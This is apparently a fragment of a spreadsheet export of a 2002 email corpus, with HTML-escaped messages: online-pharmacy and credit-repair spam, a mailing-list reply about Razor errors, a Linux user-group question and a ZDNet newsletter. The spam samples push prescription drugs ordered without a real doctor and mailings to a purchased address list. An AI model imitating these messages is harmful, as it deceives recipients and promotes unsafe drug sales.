 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial; mso-color-alt: windowtext"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face=Arial color=black 
 size=2&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial"&gt;or 
 embarassing conversations. &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT face=Arial color=black 
 size=2&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial; mso-color-alt: windowtext"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face=Arial color=black 
 size=2&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial"&gt;Just 
 fill out the form and our Doctor will &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT face=Arial 
 color=black size=2&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial; mso-color-alt: windowtext"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face=Arial color=black 
 size=2&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial"&gt;have 
 your order to you by tomorrow!&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT face=Arial color=black 
 size=2&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial; mso-color-alt: windowtext"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face=Arial color=black 
 size=4&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 13.5pt; COLOR: black; FONT-FAMILY: Arial"&gt;&lt;A 
 href="http://www.inspacehosting.net/pharmacy"&gt;&lt;FONT color=#0000ff&gt;CLICK 
 HERE&lt;/FONT&gt;&lt;/A&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face=Arial color=black 
 size=4&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 13.5pt; COLOR: black; FONT-FAMILY: Arial"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&amp;nbsp;&lt;/P&gt;&lt;B&gt;&lt;FONT 
 face=Arial color=black size=4&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 13.5pt; COLOR: black; FONT-FAMILY: Arial"&gt;
 &lt;P class=MsoNormal&gt;&lt;B&gt;&lt;FONT face=Arial color=black size=2&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial"&gt;Many 
 other prescription drugs available, including:&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT 
 face=Arial color=black size=2&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial; mso-color-alt: windowtext"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;UL type=disc&gt;
   &lt;LI class=MsoNormal 
   style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in"&gt;&lt;B&gt;&lt;FONT 
   face=Arial color=black size=2&gt;&lt;SPAN 
   style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial"&gt;XENICAL, 
   weight loss medication used to help overweight people lose weight and keep 
   this weight off.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT face=Arial color=black size=2&gt;&lt;SPAN 
   style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial; mso-color-alt: windowtext"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt; 
   &lt;LI class=MsoNormal 
   style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in"&gt;&lt;B&gt;&lt;FONT 
   face=Arial color=black size=2&gt;&lt;SPAN 
   style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial"&gt;VALTREX, 
   Treatement for Herpes.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT face=Arial color=black 
   size=2&gt;&lt;SPAN 
   style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial; mso-color-alt: windowtext"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt; 
   &lt;LI class=MsoNormal 
   style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in"&gt;&lt;B&gt;&lt;FONT 
   face=Arial color=black size=2&gt;&lt;SPAN 
   style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial"&gt;PROPECIA, 
   the first pill that effectively treats male pattern hair loss. 
   &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT face=Arial color=black size=2&gt;&lt;SPAN 
   style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial; mso-color-alt: windowtext"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/LI&gt;&lt;/UL&gt;
 &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face=Arial 
 color=black size=2&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial"&gt;And 
 Many More......&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT face=Arial color=black size=2&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial; mso-color-alt: windowtext"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P&gt;&lt;B&gt;&lt;FONT face=Arial color=#0000ff size=2&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial"&gt;&lt;A 
 href="http://www.inspacehosting.net/pharmacy"&gt;CLICK 
 HERE&lt;/A&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT face=Arial size=2&gt;&lt;SPAN 
 style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial; mso-color-alt: windowtext"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;DIV class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;FONT face=Arial 
 color=#0000ff size=2&gt;&lt;SPAN 
 style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial"&gt;
 &lt;HR align=center width="100%" SIZE=2&gt;
 &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;P class=MsoNormal&gt;&lt;FONT face=Arial color=black size=2&gt;&lt;SPAN 
 style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial"&gt;To be removed from 
 future mailings: &lt;A 
 href="http://www.inspacehosting.net/pharmacy/remove.html"&gt;&lt;FONT 
 color=#0000ff&gt;Click here&lt;/FONT&gt;&lt;/A&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;FONT face=Arial color=black 
 size=2&gt;&lt;SPAN 
 style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Arial; mso-color-alt: windowtext"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT face=Arial color=black size=4&gt;&lt;SPAN 
 style="FONT-WEIGHT: bold; FONT-SIZE: 13.5pt; COLOR: black; FONT-FAMILY: Arial; mso-color-alt: windowtext"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;      
    &lt;/span&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 --------------712SOS1SOS2--
 --------------6778712SOS1--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Clean your credit right from your computer!                  GN
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;HEAD&gt; 
 &lt;TITLE&gt;creditfix&lt;/TITLE&gt;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OUND=3Dhttp://365.sunshinehui.com/creditfix/email/background_arrow.gif WID=
 TH=3D400&gt; 
 &lt;TR&gt; 
 &lt;TD&gt;&lt;A HREF=3Dhttp://365.sunshinehui.com/creditfix/?cid=3D1590&amp;mid=3D17700=
 &gt;&lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/banner_email.gif BO=
 RDER=3D0&gt;&lt;/A&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;BR&gt; 
 &lt;A HREF=3Dhttp://365.sunshinehui.com/creditfix/?cid=3D1590&amp;mid=3D17700&gt;&lt;im=
 g src=3Dhttp://365.sunshinehui.com/creditfix/email/body_email.gif alt=3D""=
  border=3D"0"&gt;&lt;/A&gt; 
 &lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D2&gt;Thank You,&lt;/FONT&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/thankyou.gif&gt; 
 &lt;BR&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;TR&gt; 
 &lt;TD&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;br&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;Your email address was obtained from a purch=
 ased 
 list, Reference # 1590-17700.&amp;nbsp;&amp;nbsp;If you wish to unsubscribe from t=
 his list, please 
 &lt;a href=3D"http://61.172.250.143/remove/remove1.html"&gt;Click here&lt;/a&gt; and e=
 nter your 
 name into the remove box. If you have previously 
 unsubscribed and are still receiving this message, you may email our 
 &lt;a href=3D"mailto:nospamws@yahoo.com?Subject=3DAbuse Report"&gt;Abuse Control=
  Center&lt;/a&gt;, 
 or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, 
 Miami, FL, 33155".&lt;/FONT&gt;&lt;br&gt; 
 &lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;&amp;copy; 2002 Web Credit Inc. All Rights Reser=
 ved&lt;/FONT&gt;&lt;FONT FACE=3D"Verdana" SIZE=3D"1"&gt;.&lt;/FONT&gt;&lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/CENTER&gt; 
 &lt;BR&gt; 
 &lt;/BODY&gt; 
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Female circumcision does not reduce sexual activity
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8206955,1440/
 Date: Not supplied
 Nigerian researchers say their study negates arguments used to defend the 
 practice, which is still widespread in Africa
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Authentication Error
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 23, 2002 at 09:21:58PM -0700,
 Patrick &lt;patrick@stealthgeeks.net&gt; is thought to have said:
 &gt; Today's error(received multiple times) was:
 &gt; 
 &gt; Jul 23 21:16:39.288680 report[98557]: [ 2]  Razor-Agents v2.12 starting
 &gt; razor-report ./jobspam
 &gt; Jul 23 21:16:46.597147 report[98558]: [ 1] razor-report error: reportit:
 &gt; Error 213 while authenticating, aborting.
 I believe this is fixed (or at least there's a workaround in place to try
 again) in 2.125
 &gt; I really like the concept of Razor but I find myself wondering if it's
 &gt; really a good idea for the developers to be passing off what appears
 &gt; to be alpha-quality software as production-ready....
 And where does it say production-ready? http://razor.sourceforge.net says at
 the top of the page:
 June 13, 2002 - Vipul's Razor v2 released! The first beta of Vipul's Razor
 v2 is now available for public download.
 Likewise Vipul's announcement post about v2 to this list states that it is 
 beta in the first sentence.
 Tabor
 -- 
 --------------------------------------------------------------------
 Tabor J. Wells                                razor-users@fsckit.net
 Fsck It!                 Just another victim of the ambient morality
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Server Partitioning
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 Does anyone use partitioning on a Linux server? What is the recommended solution? UML? 
 Cheers,
 Sorin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Why HP could be king of servers (Tech Update)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</si>
  <si>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href="http://clickthru.online.com/Click?q=30-u8NEIRrPLM7Jz7p8IeOdSKzjX1iR"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href="http://clickthru.online.com/Click?q=45-fNkJIKBija2HZ6g-EDvznhjonlZR"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22, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;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&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;&lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0zdDyrJbh24YOLpk6Td6dR" &gt;
 &lt;b&gt;Why HP could be king of servers &lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Not only does HP have the inside track on Intel's &lt;B&gt;IA-64&lt;/B&gt;, but the company also has a companion chipset called &lt;B&gt;ZX1&lt;/B&gt;. HP is well-armed to battle IBM and Dell for server dominance.&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOL3YNz7PcU3RXvLF34ULXuR" &gt;
 &lt;b&gt;Here's the source of HP's EPIC power&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=85-2G2oQ7KrekErVyCaf70SVbToBBPR" &gt;Federal bill targets e- waste&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMpSJTmsV-Figi7yr9FKgnR" &gt;Wi-Fi group clears up naming confusion&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=af--dB8QLp7DA9Vh1-ydDX7NdmUVSeR" &gt;Movement grows to boost Wi-Fi hot spots&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WstkcJNEekHF6q-jPexAyR" &gt;Network defenders crack challenge&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPspkOP76uie23s1N87hJlR" &gt;Could WorldCom woes spark a price war?&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDDx4frjdD0QzbMuLbLad4R" &gt;Web services breeds teamwork&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rIIpKPmM4hKQcaLlAI6OrR" &gt;Gateway fights back with PC rebates&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rcgP7LzmRKMZ2Fz8IR7XlR"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src="http://image.com.com/techupdate/i/dfarber.jpg"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size="+1"&gt;&lt;b&gt;Bracing for an Internet meltdown&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Companies around the world are developing co-location facilities, interviewing backup vendors and bolstering wireless capabilities in anticipation of potential &lt;b&gt;communication service problems&lt;/b&gt;. The disgracing of vaunted names in the telecom-munications sector -- &lt;b&gt;Worldcom&lt;/b&gt;, &lt;b&gt;KPNQwest&lt;/b&gt;, &lt;b&gt;Global Crossing&lt;/b&gt; -- and talk of a broader meltdown is prompting a sense of &lt;b&gt;imminent disaster&lt;/b&gt; at companies that rely on Internet, phone or wireless connections for revenue and employee productivity. How worried are you?&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiKj5wj8LpaktQ3DlPfP8N4R" &gt;&lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJ3L1Sf1lL9Z5VKc-3P0BcR" &gt;&lt;b&gt;KPNQwest employees walk out&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 2--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="220" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/071902_tony_scott_quote.gif" width="220" height="184" border="0" align="right"&gt;
 &lt;/td&gt;
 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;What's your biggest tech nightmare?&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 It's a question that CNet News.com posed to the &lt;B&gt;top IT officers&lt;/B&gt; at some of America's largest &lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJxsQlD5tDYjKHbtbXYzHRR" &gt;Fortune 100 companies&lt;/A&gt;. Many of the technology leaders--from IBM, Citigroup, General Motors and Ford Motor--cited &lt;B&gt;security&lt;/B&gt; as the mother of all IT nightmares. Among the other complaints: cost overuns, unreliable technology, unstable vendors and disaster recovery . In contrast, &lt;B&gt;Fannie Mae CTO Julie St. John&lt;/B&gt; said nothing keeps her up at night "because I plan so far ahead on the infrastructure and the things that can bite us." What about you?&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEzJtS__AE7Bc1bJBykEmZR" &gt;
 &lt;b&gt;Take our QuickPoll&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- STORY 3 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Conditions for Itanium 2 adoption&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;B&gt;Gartner&lt;/B&gt; thinks enterprises should evaluate their Itanium 2 strategy based on three key elements: &lt;b&gt;Hardware&lt;/b&gt;, &lt;b&gt;OS&lt;/b&gt; and &lt;b&gt;applications&lt;/b&gt;. Wait until all three elements align before considering production deployment of Itanium 2 solutions.&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK2GayUWT46gJLkjCXMZHnR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 4 --&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="left"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/wayne_rash85x110.jpg" width="85" height="110" border="0" align="left"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;P&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Senate stops P2P, so should you&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The U.S. Senate sets a good, albeit belated, example by shutting off peer-to-peer networking. Tech Update's &lt;b&gt;Wayne Rash&lt;/b&gt; says you'd be foolish not to follow suit. Removing P2P networking from your company's computers is a quick way to lower the &lt;b&gt;risk of damage&lt;/b&gt; from worms and viruses--and to limit the damage a hacker can do.&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M2Z4_j0RT3V0z6qjySJGeR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Bill Gates, e-mail newsletter editor&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In the future, everyone will have their own e-mail newsletter. If &lt;b&gt;Berlind&lt;/b&gt; and &lt;b&gt;Farber&lt;/b&gt; have one, why not &lt;b&gt;Gates&lt;/b&gt; and &lt;b&gt;Ballmer&lt;/b&gt;? According to Microsoft, the two execs will issue newsletters on the company's views about the role of technology and public policy. The first volume, about Microsoft's &lt;b&gt;Trustworthy Computing&lt;/b&gt; initiative, went out Wednesday and was reputedly penned by Gates.&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEpaOcLcNiQhaIHsSzky0PR" &gt;
 &lt;b&gt;See what Bill has to say&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- Write to me --&gt;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href="http://clickthru.online.com/Click?q=c2-oXxLQUEDqh6KeyygVnxXFZcIuInR"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href="http://clickthru.online.com/Click?q=d7-wk3ZQLWDyhLPyvsRmBekeVktk2eR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;FEATURE&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy13g6THPL1kOqFb2GVaGyR" &gt;
 &lt;b&gt;Microsoft enhances directory technology&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;b&gt;Update:&lt;/b&gt; Microsoft is expanding the capability of its directory technology to allow customers to more easily add new applications to their network.&lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;REVIEW&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jxO5fGQPhvurMPGPxZ6RlR" &gt;
 &lt;b&gt;Outlook alternatives&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Need a sturdy organizer/scheduler that won't beggar you? An &lt;b&gt;alternative PIM&lt;/b&gt; might do the trick.&lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download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href="http://clickthru.online.com/Click?q=16-T_cjI4cTyOcubWzDblRuaBDxRU4R" &gt;
 &lt;b&gt;NT4 users: Act now or...&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Whether or not you like &lt;b&gt;Microsoft's new licensing plan&lt;/b&gt;, if you're still running NT4, &lt;b&gt;Larry Seltzer&lt;/b&gt; says you've got decisions to make, and soon.&lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;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href="http://clickthru.online.com/Click?q=2c-DatOIc0kqUDT_bqc-r7MBvWpjuyR" &gt;
 &lt;b&gt;Hey, thief! This laptop is locked&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Try stealing my notebook and &lt;b&gt;Caveo Anti-Theft&lt;/b&gt; will yell at you louder and louder -- before resorting to an unstoppable, ear-piercing screech.&lt;br&gt;&lt;br&gt;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size="-2"&gt;&lt;b&gt;MONITORS&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKzoDjYPmWU5CfCkxHB0FFR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/040802_monitors.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=56-NwKYInnwtJhTUuorctPQDwwaMC9R" style="text-decoration:none"&gt;&lt;b&gt;A Porsche you can afford&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
